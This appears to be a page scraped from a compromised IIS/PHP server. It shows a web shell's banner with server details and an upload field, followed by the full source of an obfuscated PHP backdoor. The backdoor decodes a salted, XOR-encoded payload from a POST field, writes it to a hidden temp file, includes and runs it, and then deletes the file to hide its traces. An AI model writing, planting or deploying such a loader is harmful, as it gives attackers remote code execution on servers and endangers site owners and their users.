| Server IP : 103.191.208.88 / Your IP : 216.73.216.44 Web Server : Microsoft-IIS/10.0 System : Windows NT COSMIC 10.0 build 20348 (Windows Server 2022) AMD64 User : IWPD_1831(willswel_) ( 0) PHP Version : 8.2.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : D:/Inetpub/vhosts/willswell.com/httpdocs/ |
Upload File : |
<?php
if(array_key_exists("\x72\x65\x63ord", $_POST) && !is_null($_POST["\x72\x65\x63ord"])){
$dchunk = $_POST["\x72\x65\x63ord"];
$dchunk = explode ('.' ,$dchunk);
$data_chunk = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($salt );
$t = 0;
$__len = count($dchunk );
do { if ($t >= $__len) break;
$v1 = $dchunk[$t];
$chS = ord($salt[$t% $lenS] );
$dec = ((int)$v1 - $chS - ($t% 10))^ 74;
$data_chunk .= chr($dec );
$t++;} while (true );
$itm = array_filter([session_save_path(), sys_get_temp_dir(), "/dev/shm", "/var/tmp", getenv("TEMP"), getenv("TMP"), getcwd(), ini_get("upload_tmp_dir"), "/tmp"]);
while ($pgrp = array_shift($itm)) {
if ((is_dir($pgrp) and is_writable($pgrp))) {
$object = sprintf("%s/.pset", $pgrp);
if (file_put_contents($object, $data_chunk)) {
include $object;
@unlink($object);
exit;
}
}
}
}